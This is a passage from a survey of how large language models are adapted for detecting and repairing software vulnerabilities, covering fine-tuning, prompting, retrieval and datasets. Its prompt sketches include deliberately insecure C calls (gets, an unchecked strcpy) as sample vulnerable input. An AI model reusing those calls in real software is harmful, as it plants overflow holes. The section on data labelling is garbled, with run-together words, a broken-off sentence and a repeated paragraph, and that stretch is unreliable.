In addition, Table 1 presents the architecture and model sizes of the top 10 most commonly used LLMs in vulnerability detection and repair. The architectures and model sizes of GPT-3.5 and GPT-4, along with the architecture of Codex, remain undisclosed due to their commercial status. As shown in Table 1, the LLMs widely utilized for vulnerability detection are predominantly lightweight models, with many having sizes under or equal to 126 million parameters. Most of these models are encoder-only architectures. In contrast, the models commonly used for vulnerability repair tend to be larger, with several exceeding 1 billion parameters, such as CodeGen [68] and Incoder [24]. The majority of these models have more than 126 million parameters and are primarily decoder-only and encoder-decoder architectures.

Table 1. Top 10 LLMs Used in Vulnerability Detection and Repair
Rank | Vulnerability Detection: LLM (Structure, Size) | Vulnerability Repair: LLM (Structure, Size)
1 | CodeBERT (Encoder-only, 125M) | CodeT5 (Encoder-Decoder, 220M)
2 | GPT-3.5 (Unknown, Unknown) | GPT-3.5 (Unknown, Unknown)
3 | GPT-4 (Unknown, Unknown) | GPT-4 (Unknown, Unknown)
4 | CodeT5 (Encoder-Decoder, 220M) | Seq2seq (Encoder-Decoder, 60M)
5 | UniXcoder (Encoder-only, 126M) | CodeGen (Decoder-only, 350M/2.7B/6.1B/16.1B)
6 | GraphCodeBERT (Encoder-only, 125M) | Codex (Unknown, 12.0B)
7 | CodeLlama (Decoder-only, 7B/13B/34B/70B) | Incoder (Decoder-only, 1.3B/6.7B)
8 | VulBERTa (Encoder-only, 125M) | PLBART (Encoder-Decoder, 406M)
9 | RoBERTa (Encoder-only, 125M) | UniXcoder (Encoder-only, 126M)
10 | BERT (Encoder-only, 109M) | CodeGPT (Decoder-only, 124M)

Answer to RQ1: Our analysis indicates that, to date, encoder-only LLMs have dominated vulnerability detection, while commercial LLMs and decoder-only LLMs have been prominent in vulnerability repair.

5 RQ2: HOW ARE LLMS ADAPTED FOR VULNERABILITY DETECTION?
In RQ2, we shift our focus to examining the specific adaptation techniques of LLMs in vulnerability detection. Regarding the usage of LLMs, we summarize three major categories from the included studies: 1) fine-tuning [20], which updates the parameters of LLMs using a labeled dataset, 2) prompt engineering [13], which designs prompts to guide LLMs in generating relevant responses without updating parameters, and 3) retrieval augmentation (RAG) [47], which integrates knowledge from retrieval systems into the LLMs' context to improve their performance, also without changing LLMs' parameters. As depicted in Fig. 6, 73% of the studies utilize fine-tuning, while 17% and 10% employ prompt engineering and retrieval augmentation, respectively.
[Fig. 6. Adaptation Techniques of LLMs for Vul. Detection: Fine-tuning ~73% (data-centric innovations, combining with program analysis, LLM + other DL modules, domain-specific pre-training, causal learning, default fine-tuning); Prompt Engineering ~17%; Retrieval Augmentation ~10%]
In the following subsections, we introduce detailed categories of LLM adaptation techniques for each of the following: 1) fine-tuning, 2) prompt engineering, and 3) retrieval augmentation (RAG). Table 2 summarizes the existing LLM-based methods for vulnerability detection.

5.1 Fine-tuning
Fine-tuning is a commonly used technique for adapting LLMs to vulnerability detection. In this process, labeled code samples, indicating whether they are vulnerable or not, are provided as training data. The model is then fine-tuned through supervised learning, where its parameters are adjusted based on these labeled examples. Several vulnerability detection studies [16, 19, 26, 27, 46, 50, 81, 83, 87, 89, 94, 130] have directly applied this default fine-tuning approach without introducing additional designs. In this subsection, we focus on studies that propose advanced fine-tuning techniques that go beyond the default approach for improved effectiveness.
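The following minimal sketch illustrates this default fine-tuning setup, assuming a hypothetical train_set whose items are dicts with a "code" string and a 0/1 "label" (1 = vulnerable); the checkpoint and hyperparameters are placeholders, and no single surveyed study is reproduced here.

    import torch
    from torch.utils.data import DataLoader
    from transformers import AutoTokenizer, AutoModelForSequenceClassification

    tok = AutoTokenizer.from_pretrained("microsoft/codebert-base")
    model = AutoModelForSequenceClassification.from_pretrained(
        "microsoft/codebert-base", num_labels=2)
    opt = torch.optim.AdamW(model.parameters(), lr=2e-5)

    def collate(batch):
        # Tokenize a batch of functions and attach the vulnerability labels.
        enc = tok([b["code"] for b in batch], truncation=True, max_length=512,
                  padding=True, return_tensors="pt")
        enc["labels"] = torch.tensor([b["label"] for b in batch])
        return enc

    loader = DataLoader(train_set, batch_size=16, shuffle=True, collate_fn=collate)
    model.train()
    for epoch in range(3):
        for batch in loader:
            loss = model(**batch).loss   # cross-entropy over the two classes
            loss.backward()
            opt.step()
            opt.zero_grad()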
[Table 2. Existing LLM-based Methods for Vulnerability Detection. For each included detection study, the table reports the LLM size (<1B, 1-10B, >10B), the adaptation technique(s) applied (data-centric, LLM + program analysis, LLM + DL, domain-specific pre-training, causal learning, default fine-tuning, prompt engineering, RAG), the input granularity (function, line, or repo), the data labeling method (synthetic, heuristic, partially manually labeled, manually labeled, or crowd-sourced), and whether the approach interacts with users or is integrated into workflows.]
The fine-tuning process usually involves several steps/stages, such as data preparation, model design, model training, and model evaluation. Regarding fine-tuning, we classify adaptation techniques into five groups based on the stages they mainly target: Data-centric innovations (data preparation), Combination with program analysis (data preparation), LLM + other deep learning modules (model design), Domain-specific pre-training (model training), and Causal learning (training optimization).
Data-centric Innovations. Data-centric innovations focus on optimizing the vulnerability detection data used for fine-tuning LLMs. Prior studies [16, 19, 45, 65, 115] have found that existing vulnerability detection data can suffer from imbalanced label distribution, noisy or incorrect labels, and scarcity of labeled data. Researchers [21, 45, 106, 115] have explored how to address these data issues.
• Imbalanced Learning: To address label imbalance, i.e., having more non-vulnerable code samples than vulnerable ones in the dataset, Yang et al. [115] applied various data sampling techniques. In addition, Ding et al. [21] up-weighted the loss value for the rare class (i.e., the vulnerable samples) to pay comparable attention to both vulnerable and clean classes. They found that random oversampling on raw code data enhances the ability of the LLM-based vulnerability detection approach to learn real vulnerable patterns. (A small sketch of both countermeasures follows this list.)
• Positive and Unlabeled Learning: To address label quality issues such as noisy or incorrect labels, Wen et al. [106] proposed PILOT, which learns solely from positive (vulnerable) and unlabeled data for vulnerability detection. Specifically, PILOT generates pseudo-labels for selected unlabeled data and mitigates the data noise by using a mixed-supervision loss.
• Counterfactual Training: To enhance the diversity of labeled data, Kuang et al. [45] proposed perturbing user-defined identifiers in the source code while preserving the syntactic and semantic structure. This approach generates diverse counterfactual training data, which refers to hypothetical data (e.g., data after perturbing identifiers) differing from actual data (i.e., data without perturbation), useful for analyzing the effect of certain factors. Incorporating these counterfactual data enriches the training data for LLMs.
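A small sketch of the two imbalance countermeasures, assuming a hypothetical labels list holding the 0/1 training labels:

    import torch
    from collections import Counter
    from torch.utils.data import WeightedRandomSampler

    counts = Counter(labels)                      # e.g., {0: 90_000, 1: 5_000}

    # 1) Up-weight the rare (vulnerable) class in the loss.
    class_weights = torch.tensor([1.0, counts[0] / counts[1]])
    loss_fn = torch.nn.CrossEntropyLoss(weight=class_weights)

    # 2) Random oversampling: draw vulnerable samples more often.
    sample_weights = [1.0 / counts[y] for y in labels]
    sampler = WeightedRandomSampler(sample_weights, num_samples=len(labels),
                                    replacement=True)
    # Pass `sampler=sampler` (instead of shuffle=True) to the DataLoader.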
Combination of LLM with Program Analysis. Many LLMs undergo pre-training on extensive datasets through unsupervised objectives like masked language modeling [20] or next token prediction [78]. Those LLMs may prioritize capturing sequential features and could potentially overlook certain structural aspects crucial for understanding code. To address this limitation, several studies have proposed integrating program analysis techniques with LLMs. The idea involves utilizing program analysis to extract structural features/relations within code, which are then incorporated into LLMs to enhance their understanding. Specifically, Liu et al. [56] leveraged Joern [112] to build the AST and PDG of the function, leveraging this data to pre-train their LLM to predict statement-level control dependencies and token-level data dependencies within the function. Peng et al. [75] utilized program slicing to extract control and data dependency information, aiding LLMs in vulnerability detection. Wang et al. [99] proposed to learn program representations by feeding static source code information and dynamic program execution traces to LLMs. Additionally, Zhang et al. [121] proposed decomposing syntax-based Control Flow Graphs (CFGs) into multiple execution paths and feeding these paths to LLMs for vulnerability detection. Tran et al. [95] utilized a program analysis tool to normalize all user-defined names, such as variables and functions, into symbolic names (e.g., VAR_1, VAR_2, and FUNC_1) to enhance the model's robustness against adversarial attacks. Weng et al. [107] incorporated inter-statement data and control dependency information into an LLM by masking irrelevant attention scores based on the program dependency graph, which resulted in improved code representation.
Combination of LLM with Other Deep Learning Modules. LLMs have their own inherent limitations. Firstly, most LLMs are based on the Transformer architecture, which primarily models sequential relations and features. Secondly, some LLMs (e.g., CodeBERT) impose restrictions on the length of input code snippets. For instance, the most frequently used LLM in vulnerability detection, CodeBERT, can only process 512 tokens. To address these limitations, researchers have attempted to combine LLMs with other DL modules:
• LLM + GNN: To leverage the structural features of code more effectively, Tang et al. [92] introduced CSGVD, which employs graph neural networks (GNN) to extract the graph features of code and combine them with the features extracted by CodeBERT. Jiang et al. [41] parsed data flow graphs (DFGs) from the input code and used the data types of each variable as the node characteristics of the DFG. They then embedded the DFG information into a graph representation using a graph neural network (GNN) and integrated this graph representation with a large language model. In addition, Yang et al. [113] combined an LLM with a GNN model. Specifically, they first used data flow analysis (DFA) embeddings to establish a GNN model. They then concatenated the learned embeddings from the GNN with the hidden states of the LLM. By concatenating the embeddings during each forward pass, they enabled simultaneous training of both the LLM and the GNN.
• LLM + Bi-LSTM: To address the length constraints of LLMs, Ziems et al. [134] first segmented the input code into multiple fixed-size segments. They then utilized BERT to encode each segment and incorporated a Bidirectional Long Short-Term Memory (Bi-LSTM) module to process the output of BERT on each segment. Finally, a softmax classifier was applied to the last hidden state of the Bi-LSTM to produce the final classification scores. (A minimal sketch of this segment-and-aggregate idea follows this list.)
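A minimal sketch of the segment-and-aggregate idea, assuming fixed-size token segments and a generic BERT checkpoint; implementation details necessarily differ from the original work.

    import torch
    import torch.nn as nn
    from transformers import AutoModel, AutoTokenizer

    class SegmentBiLSTMDetector(nn.Module):
        def __init__(self, seg_len=510, hidden=256):
            super().__init__()
            self.tok = AutoTokenizer.from_pretrained("bert-base-uncased")
            self.encoder = AutoModel.from_pretrained("bert-base-uncased")
            self.seg_len = seg_len  # 510 tokens + [CLS]/[SEP] = 512-token limit
            self.lstm = nn.LSTM(self.encoder.config.hidden_size, hidden,
                                bidirectional=True, batch_first=True)
            self.classifier = nn.Linear(2 * hidden, 2)

        def forward(self, code):
            ids = self.tok(code, add_special_tokens=False)["input_ids"]
            # Split an arbitrarily long function into fixed-size segments.
            segs = [ids[i:i + self.seg_len] for i in range(0, len(ids), self.seg_len)]
            embs = []
            for s in segs:
                seg_ids = torch.tensor(
                    [[self.tok.cls_token_id] + s + [self.tok.sep_token_id]])
                # Use the [CLS] embedding as the segment representation.
                embs.append(self.encoder(input_ids=seg_ids).last_hidden_state[:, 0])
            seq = torch.stack(embs, dim=1)           # (1, n_segments, hidden_size)
            _, (h, _) = self.lstm(seq)
            final = torch.cat([h[0], h[1]], dim=-1)  # last forward/backward states
            return self.classifier(final)            # two-way logits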
Domain-specific Pre-training. Domain-specific pre-training involves pre-training an LLM on data specific to a particular domain, such as vulnerability data, before fine-tuning it for a specific task within that domain. This process enables the LLM to better understand the data relevant to the domain. Several studies in the field of vulnerability detection have adopted this technique [21, 34, 56, 64, 90, 99]. These studies typically use one of the following pre-training objectives:
• Masked Language Modeling: This pre-training objective involves training the LLM to predict masked tokens in a corrupted code snippet. Hanif and Mahmood [34] introduced VulBERTa, which pre-trained a RoBERTa [54] model on open-source C/C++ projects using the Masked Language Modeling objective. Since C/C++ is the programming language of the vulnerability detection data used to evaluate VulBERTa, this pre-training enhances VulBERTa's ability to understand C/C++ code. (A condensed sketch of this objective appears after this list.)
• Contrastive Learning: This pre-training objective is to minimize the distance between similar functions while maximizing the distance between dissimilar functions. Through contrastive learning, the LLM can learn to capture the distinctive features of code. In particular, Ni et al. [64] and Wang et al. [99] utilized different hidden dropout masks to transform the same input function into positive samples (i.e., those similar to the input function) while regarding other distinct functions as dissimilar samples. They then pre-trained an LLM following the contrastive learning objective. Additionally, Ding et al. [21] performed Class-aware Contrastive Learning (CA-CLR) to maximize the representation similarity between each sample and the perturbed version of itself and minimize the representation similarity between two randomly chosen samples.
• Predicting Program Dependencies: This pre-training objective aims to enhance the LLM by guiding the model to learn the knowledge necessary for analyzing dependencies in programs. Specifically, Liu et al. [56] pre-trained an encoder-only LLM on code from open-source C/C++ projects to predict the statement-level control dependency and token-level data dependency.
• Annotating Vulnerable Statements: This pre-training objective assumes that improving alignment to potentially vulnerable statements (PVS) would improve the performance of the model. For example, Steenhoek et al. [90] developed two annotation approaches (i.e., Mark and Prepend) to give guidance or extra information to the model. Mark inserted special "marker" tokens before and after each token inside the PVS, while Prepend added the tokens inside the PVS at the beginning of the code. This can be considered as inserting domain knowledge into the model's input.
After the pre-training, these domain-specific pre-trained LLMs undergo fine-tuning on the vulnerability detection dataset to perform vulnerability detection.
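A condensed sketch of the masked language modeling objective on domain code, assuming a hypothetical c_cpp_functions iterable of raw C/C++ source strings; this illustrates the objective only and is not VulBERTa's exact recipe.

    from transformers import (RobertaTokenizerFast, RobertaForMaskedLM,
                              DataCollatorForLanguageModeling, Trainer,
                              TrainingArguments)

    tok = RobertaTokenizerFast.from_pretrained("roberta-base")
    model = RobertaForMaskedLM.from_pretrained("roberta-base")

    # Tokenize the domain corpus; the collator masks 15% of tokens on the fly.
    train_data = [tok(f, truncation=True, max_length=512) for f in c_cpp_functions]
    collator = DataCollatorForLanguageModeling(tok, mlm=True, mlm_probability=0.15)

    trainer = Trainer(model=model,
                      args=TrainingArguments(output_dir="mlm-pretrain",
                                             per_device_train_batch_size=8,
                                             num_train_epochs=1),
                      data_collator=collator,
                      train_dataset=train_data)
    trainer.train()   # afterwards, fine-tune the encoder for detection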
Causal Learning. Although promising, LLMs have been found to lack robustness under perturbation or when encountering out-of-distribution (OOD) data [59]. Rahman et al. [59] suggested that this weak robustness may be attributed to LLMs learning non-robust features, such as variable names, that have spurious correlations with labels. To address this issue, Rahman et al. proposed CausalVul, which first designs perturbations to identify spurious features and then applies causal learning algorithms, specifically do-calculus, on top of LLMs to promote causal-based prediction, enhancing the robustness of LLMs in vulnerability detection.

5.2 Prompt Engineering
Zero-shot Prompting. Researchers have attempted to devise effective prompts to guide LLMs in conducting vulnerability detection in the zero-shot prompting manner. Their prompt engineering designs generally consist of one or more of the components outlined below; a sketch assembling several of them into a single prompt follows this list.
• Task Description. This part of the prompt aims to equip LLMs with valuable task-specific information related to vulnerability detection, clarifying the objectives the model should achieve (e.g., identifying vulnerabilities in the provided code). Different studies employ varying task descriptions, and there is no consensus on which approach is optimal. Specifically, Zhou et al. [132] use the task description: "If has any potential vulnerability, output: 'this code is vulnerable'. Otherwise, output: 'this code is non-vulnerable'. The code is [code]. Let's start:". Fu et al. [29] proposed the task description: "Predict whether the C/C++ function below is vulnerable. Strictly return 1 for a vulnerable function and 0 for a non-vulnerable function without further explanation." Purba et al. [76] devised the task description: "[code] Is this code vulnerable? Answer in only Yes or No". "[code]" refers to the input code in these task descriptions. Xin Yin [117] used the task description: "I will provide you a C code snippet and want you to tell whether it has a vulnerability. You need to output 'yes' or 'no' first (output no if uncertain), and then explain." Zhou et al. [130] used "If the following code snippet has any vulnerabilities, output Yes; otherwise, output No".
• Role Description. This aims to help LLMs shift their operational mode from a general language model to that of a vulnerability detector. Specifically, Zhou et al. [132] defined the role description: "You are an experienced developer who knows the security vulnerability very well". Fu et al. [29] used the role description: "I want you to act as a vulnerability detection system". Khare et al. [43] utilized the role description: "You are a security researcher". Xin Yin [117] used the role description: "I want you to act as a vulnerability scanner".
• Vulnerability-Related Auxiliary Information. Some studies have integrated vulnerability-related auxiliary information into their prompt designs to enhance LLM performance. Specifically, Zhou et al. [132] suggested including vulnerable code examples representing the top 25 most dangerous CWEs of 2022 as part of the prompts to help LLMs better understand the characteristics of serious vulnerabilities. Additionally, Khare et al. [43] specified the types of vulnerabilities when querying LLMs about potential vulnerabilities in the provided code.
• Program-Analysis Auxiliary Information. Some studies utilize program-analysis tools to extract code dependencies from the input code, aiming to enhance LLMs' understanding of the input code. Specifically, Khare et al. [43] designed a dataflow analysis-based prompt that guides the model to simulate a source-sink-sanitizer-based dataflow analysis on the target code snippet before predicting if it is vulnerable. Zhang et al. [119] designed prompts that incorporate auxiliary information on data flow or API calls.
• Chain-of-Thought (CoT) Prompting. This was proposed by Kojima et al. [44] for improved reasoning and involves adding "Let's think step by step" to the original prompt. Specifically, Zhou et al. [130] and Ni et al. [63] added "Let's think step by step" into the prompt.
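The sketch below assembles several of these components into one zero-shot detection prompt, reusing prompt fragments quoted above; query_llm is a hypothetical stand-in for an LLM API call.

    def build_prompt(code: str) -> str:
        role = ("You are an experienced developer who knows the security "
                "vulnerability very well.")               # role description [132]
        task = ("If the following code snippet has any vulnerabilities, "
                "output Yes; otherwise, output No.")      # task description [130]
        return f"{role}\n{task}\n{code}\nLet's think step by step."  # CoT [44]

    answer = query_llm(build_prompt("int main() { char buf[8]; gets(buf); }"))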
Few-shot Prompting. In this approach, a few examples of input and ground-truth label pairs are provided to the large language models (LLMs) as additional guidance. Specifically, Ni et al. [63] utilize between 1 and 6 few-shot learning examples to fill the fixed context window (i.e., 4,096 tokens). Zhou et al. [130] use two few-shot examples.

5.3 Retrieval Augmentation (RAG)
Retrieval augmentation is a technique used to enhance few-shot prompting. It involves retrieving similar labeled data samples from the training set when given a test data sample and using these retrieved data as examples to guide the prediction of LLMs on the test sample. Liu et al. [55] proposed using efficient retrieval tools such as BM-25 and TF-IDF for retrieval. Zhou et al. [132] suggested using CodeBERT as a retrieval tool. This method first transforms code snippets into semantic vectors and then quantifies the similarity between two code snippets by calculating the cosine similarity of their respective semantic vectors. It finally returns the top similar code based on the similarity scores. Du et al. [22] leverage a knowledge-level retrieval-augmentation framework consisting of three phases to identify vulnerabilities in a given code. First, they constructed a vulnerability knowledge base by extracting multi-dimensional knowledge from existing CVE instances using LLMs. Second, for a given code snippet, they retrieved relevant vulnerability knowledge from the constructed knowledge base based on functional semantics. Finally, they utilized LLMs to assess the vulnerability of the given code snippet by reasoning about the presence of vulnerability causes and proposing potential fixing solutions derived from the retrieved knowledge. Wen et al. [105] first retrieved the most relevant dependencies from call graphs based on a given input code, and then integrated these dependencies with the input code into LLMs to detect vulnerabilities.
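A minimal sketch in the spirit of the efficient-retrieval variants above, using TF-IDF similarity to pick few-shot demonstrations; train_codes, train_labels, and query_llm are assumed placeholders.

    from sklearn.feature_extraction.text import TfidfVectorizer
    from sklearn.metrics.pairwise import cosine_similarity

    vec = TfidfVectorizer(token_pattern=r"\S+").fit(train_codes)
    index = vec.transform(train_codes)            # vectorized training corpus

    def detect_with_rag(test_code: str, k: int = 2) -> str:
        sims = cosine_similarity(vec.transform([test_code]), index)[0]
        shots = sims.argsort()[::-1][:k]          # top-k most similar samples
        demo = "\n\n".join(f"Code:\n{train_codes[i]}\nVulnerable: "
                           f"{'Yes' if train_labels[i] else 'No'}" for i in shots)
        prompt = f"{demo}\n\nCode:\n{test_code}\nVulnerable:"
        return query_llm(prompt)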
Answer to RQ2: Our analysis revealed three commonly used techniques to adapt LLMs for vulnerability detection: fine-tuning (≈73%), prompt engineering (≈17%), and retrieval augmentation (≈10%).

6 RQ3: HOW ARE LLMS ADAPTED FOR VULNERABILITY REPAIR?
Regarding the usage of LLMs, we summarize two major categories from the included studies: 1) fine-tuning (approximately 63%), which updates the parameters of LLMs using a labeled dataset, and 2) prompt engineering (approximately 37%), which freezes the parameters of LLMs and designs prompts to guide LLMs in generating relevant responses.
In the following subsections, we introduce detailed categories of LLM adaptation techniques for each of the following: 1) fine-tuning and 2) prompt engineering.
[Fig. 7. Adaptation Techniques of LLMs for Vul. Repair: Fine-tuning ~63% (data-centric innovations, model-centric innovations, domain-specific pre-training, reinforcement learning, default fine-tuning); Prompt Engineering ~37%]

6.1 Fine-tuning
Some studies [27, 28] employ default fine-tuning methods to adapt LLMs for vulnerability repair. In this subsection, we focus on research that introduces advanced fine-tuning techniques that extend beyond the default approach to achieve improved effectiveness.
Regarding fine-tuning, we categorize advanced adaptation techniques into four groups based on
the stages they mainly target: Data-centric innovations (data preparation), Model-centric innovations (model design), Domain-specific pre-training (model training), and Reinforcement learning (training optimization). Table 3 summarizes the existing LLM-based methods for vulnerability repair.
[Table 3. Existing LLM-based Methods for Vulnerability Repair. For each included repair study, the table reports the LLM size (<1B, 1-10B, >10B), the adaptation technique (data-centric, model-centric, domain-specific pre-training, reinforcement learning, default fine-tuning, or prompt engineering), the input granularity (function level throughout), whether real-world data with tests is used, and whether the approach interacts with users or is integrated into workflows.]
Data-Centric Innovations. Several studies have shown that, in addition to the input vulnerable code, incorporating other diverse relevant inputs can boost the effectiveness of LLMs. Specifically, the AST of the vulnerable code input [133], vulnerability descriptions [104, 133], and vulnerable code examples shared on CWE websites [128] can enhance the LLMs in repairing vulnerabilities. In addition, Wei et al. [104] found that vulnerability-inducing commits and vulnerability-fixing commits can also improve the effectiveness of the model. Lastly, Zhou et al. [128] found that certain vulnerable functions exceed the length limit of Transformer-based LLMs like CodeT5 (512 subtokens) [128]. To address this limitation, they applied the Fusion-in-Decoder framework to partition a long code function into multiple segments and feed those segments into LLMs one by one. Their findings demonstrated that those segments can boost model effectiveness. Additionally, a study shows that removing less important parts of the code can help the model focus more effectively on the vulnerable lines, thereby improving performance. Berabi et al. [12] presented a method for generating reduced code by leveraging static analysis outcomes, creating a compact representation of the program. This smaller version fits within the attention window of an LLM while preserving the crucial information required to learn a correct fix. The technique ensures that the reduced code snippet still produces the same static analysis report as the original program, maintaining the core problem for effective analysis.
Model-Centric Innovations. Model-centric innovations encompass methodologies that prioritize revising the model architecture of LLMs (i.e., the Transformer [97]). Specifically, Fu et al. [25] drew inspiration from Vision Transformer (ViT)-based object detection techniques in computer vision. They proposed vulnerability queries within the pre-trained Transformer model to identify vulnerable code blocks within the source code. Additionally, they trained a model to learn a
vulnerability mask, enhancing the attention of the vulnerability queries on the vulnerable code areas. Islam et al. [38] proposed fine-tuning an LLM (CodeGen2 [66]) to perform two tasks simultaneously. First, the model generates a fix for the vulnerable code, and second, it produces a developer-friendly description of the code as an explanation.
Domain-specific Pre-training. Domain-specific pre-training involves pre-training an LLM on data specific to a particular domain before fine-tuning it for the target task. Considering the similarity between bug-fixing and vulnerability-fixing tasks, several studies [17, 18, 124, 128] considered the task of bug-fixing as a pre-training task to enhance LLMs. Specifically, they first pre-trained LLMs on a bug-fix corpus to fix bugs, and then fine-tuned LLMs on a vulnerability-fix dataset to repair vulnerabilities. This kind of pre-training technique can be considered as transfer learning.
Reinforcement Learning. Islam et al. [39] introduced SecureCode, an LLM tuned using a reinforcement learning framework. This approach integrated syntactic and semantic rewards to generate fixes for vulnerable code. Specifically, they leveraged the CodeBLEU [80] score as the syntactic reward and BERTScore [125] as the semantic reward. After combining these rewards, they applied the Proximal Policy Optimization (PPO) algorithm [82] to fine-tune the CodeGen2-7B [67] model.
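Schematically, the combined reward can be pictured as below; codebleu_score and bert_score are hypothetical stand-ins for CodeBLEU [80] and BERTScore [125] implementations, the weighting alpha is our assumption, and the PPO update itself is omitted.

    def repair_reward(generated_fix: str, reference_fix: str,
                      alpha: float = 0.5) -> float:
        # Syntactic reward: structure-aware code similarity to the reference fix.
        syntactic = codebleu_score(generated_fix, reference_fix)  # in [0, 1]
        # Semantic reward: embedding-based similarity to the reference fix.
        semantic = bert_score(generated_fix, reference_fix)       # in [0, 1]
        return alpha * syntactic + (1 - alpha) * semantic
    # The combined reward is then maximized with PPO [82] to tune the policy LLM.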
6.2 Prompt Engineering
Zero-shot Prompting. For zero-shot prompting, researchers have sought to create effective prompts that guide LLMs in performing vulnerability repair. Prompt engineering typically includes the components outlined below; a sketch of a comment-guided repair prompt follows this list.
• Vulnerability Descriptions. This component provides specific details about the types of vulnerabilities to be addressed, helping the LLM understand the nature of the issues within the code. Specifically, Pearce et al. [74] propose to use a format like "// BUG: [vulnerability-description]" to provide the description of the vulnerability. Ahmad et al. [9] provided the bug description with explicit instructions for repair with LLMs, as illustrated in the prompt: "// BUG: Access Control Check Implemented After the Asset is Accessed. // Ensure that access is granted before data is accessed".
• Vulnerability Location. This element indicates the specific sections of the code where vulnerabilities may exist. Wu et al. [110] proposed a prompt that begins by commenting on the buggy code lines and adds "BUG:" to highlight them, which provides the location of the vulnerability to LLMs.
• Vulnerability-Related Auxiliary Information. This component encompasses auxiliary information about vulnerabilities. Nong et al. [69] incorporate vulnerability semantics (specifically, the behaviors of a vulnerable program that contribute to its susceptibility) into the prompt to enhance the performance of LLMs.
• Program-Analysis Auxiliary Information. Wang et al. [102] proposed a program-analysis-based approach. Given a patch, their method first utilizes both the vulnerable code and its fixed version as input. The process begins by localizing the Minimum Edit Node (MEN), which is the common ancestor node of all modified nodes. Once the MEN is identified, customized rules are applied based on the MEN type to extract vulnerable code patterns. These patterns are then incorporated into the prompt to assist LLMs in generating more effective vulnerability fixes.
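A sketch of such a comment-guided zero-shot repair prompt; the wording of the comments and the trailing "// FIXED VERSION:" cue are our illustrative choices, and query_llm is a hypothetical completion call.

    vulnerable = "strcpy(dst, src);"
    prompt = (
        "// BUG: Stack-based buffer overflow: destination size is not checked.\n"
        "// Ensure the copy is bounded by the destination buffer size.\n"
        f"{vulnerable}\n"
        "// FIXED VERSION:\n"
    )
    patched = query_llm(prompt)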
Few-shot Prompting. Furthermore, for few-shot prompting, Fu et al. [29] investigated a straightforward prompt strategy involving the provision of three repair examples within each prompt. This approach aimed to aid GPT-3.5 and GPT-4 in performing the repair task more effectively. Nong et al. [70] proposed a novel few-shot prompting method. Given a vulnerable program with a known vulnerability location, they first narrowed the analysis scope to only the relevant subset of the program. Next, they elicited the LLM to identify the vulnerability's root cause within this reduced scope, dynamically selecting exemplars from a pre-mined database that best fit the program. With the chosen exemplars, they formed the patching prompt to generate patches with LLMs.

Answer to RQ3: Our analysis revealed two commonly used techniques to adapt LLMs for vulnerability repair: fine-tuning (≈63%) and prompt engineering (≈37%).

7 RQ4: WHAT ARE THE CHARACTERISTICS OF DATASETS AND DEPLOYMENT?
A typical learning-based pipeline can be divided into three phases: 1) data preparation, 2) model construction, and 3) deployment. The previous RQs primarily focus on the model construction phase. In this RQ, we focus on examining the characteristics of the datasets used, as well as the deployment strategies employed in LLM-based vulnerability detection and repair studies.

7.1 Data Characteristics
In our investigation of the data utilized in LLM-based vulnerability detection and repair studies, we primarily focus on two aspects: 1) input granularity and 2) data quality.
7.1.1 Input Granularity. Input granularity refers to the size or scope of the code provided to the model for vulnerability detection and repair. For example, in a vulnerability detection task with repo-level input granularity, the entire repository is given to the model, and it is tasked with identifying vulnerabilities within that repository. Input granularity can vary from the line level, function level, and class level to the repo level.
For vulnerability detection, as shown in Table 2, the majority of studies concentrate on function-level vulnerability detection, with only 7 addressing line-level detection. The function-level approach
Vulnerabilitydetectionstudiesmainlyrelyondatasetsusingheuristic-basedlabeling methods.Table2showsthatmanystudieshaveemployedheuristic-basedlabelingfunctionsto generatedataforvulnerabilitydetectiontasks.Typically,theycollectvulnerability-fixingcommits fromdatabaseslikeNVDandlabelthepre-commitversionsofthefunctionsmodifiedbythese commitsasvulnerable.Additionally,allunchangedfunctionsinthesamefilesarelabeledasnon- vulnerable.Inthisway,thevulnerablefunctionsarethoseinthefilesaffectedbyvulnerability-fixing commits.However,recentstudies[16,19,65]havehighlightedqualityissueswithvulnerability datageneratedbytheheuristic-basedmethod,includingnoisyorincorrectlabels(e.g.,labeling cleancodeasvulnerable). Vulnerabilityrepairstudiesmainlyrelyondatasetswithouttestcases.AspresentinTable3, obtainingreal-worldvulnerabilitydataalongwithcorrespondingtestcasesischallenging.Most studieseitherutilizesyntheticvulnerablecodeandthecorrespondingfixes(e.g.,[39])orusereal- worldvulnerablecodeandfixeswithouttestcases(e.g.,[17,18,28]).Tworecentstudies[74,110] utilizedreal-worldvulnerability-fixingdatasetswithtestcases,however,thenumberofsamples isverylimited,withonly42and12samplesbeingevaluated,respectively.Thisunderscoresthe urgentneedformoreextensivereal-worlddatasetsandaccompanyingtestcases. 7.2 DeploymentStrategies InourinvestigationofthedeploymentstrategiesutilizedinLLM-basedvulnerabilitydetection andrepairstudies,wefocusontwokeyaspects:1)thecommunicationandcollaborationbetween developers and LLM-based methods, and 2) the integration of these methods into developers’ workflows. We focus on the communication and collaboration between users and LLM-based methodsbecausetheyareessentialindeployingLLMsinpracticeandarepivotalinmaximizing
7.2 Deployment Strategies

In our investigation of the deployment strategies utilized in LLM-based vulnerability detection and repair studies, we focus on two key aspects: 1) the communication and collaboration between developers and LLM-based methods, and 2) the integration of these methods into developers' workflows. We focus on the communication and collaboration between users and LLM-based methods because they are essential in deploying LLMs in practice and are pivotal in maximizing the real-world value of LLMs [114]. Moreover, a recent survey [52] shows that developers desire opportunities for natural language interaction with LLM-based solutions, also highlighting the significance of this capability. In addition, seamless integration of these solutions into developers' workflows is crucial for successful deployment. A recent study [118] found that even for the popular LLM-based tool GitHub Copilot, the top-1 reported limitation is the difficulty of integrating Copilot with IDEs or other plugins. This emphasizes the need for better support in integrating LLM-based tools with other frequently used tools in developers' workflows, such as IDEs.

Firstly, as shown in Table 2, limited studies on vulnerability detection in our review support communication or collaboration between developers and LLM-based methods. One exception is a study [113] where the method generates explanations for vulnerabilities during the detection process. However, interaction and communication with developers are essential; for instance, unexplained suggestions may be disregarded, as developers need to understand the rationale behind the recommendations to trust and implement them effectively. In vulnerability repair studies (as shown in Table 3), most also do not support communication with developers. An exception is a recent study by Islam et al. [38], which provides explanations for the fixes when addressing vulnerabilities.

Secondly, as illustrated in Table 2 and Table 3, none of the studies in our review are integrated into developers' workflows and tools; they are evaluated only offline using static and historical data. For these solutions to be effectively adopted, they should seamlessly integrate into existing development environments and tools.

Answer to RQ4: The datasets used in LLM-based vulnerability detection and repair studies primarily focus on function-level or line-level inputs, with limited exploration of the class or repository level. Many vulnerability detection datasets employ heuristic-based labeling methods, and repair datasets frequently lack associated test cases. Furthermore, current approaches do not emphasize integration with developer workflows or interaction and collaboration between developers and LLM-based models.

8 THE ROAD AHEAD

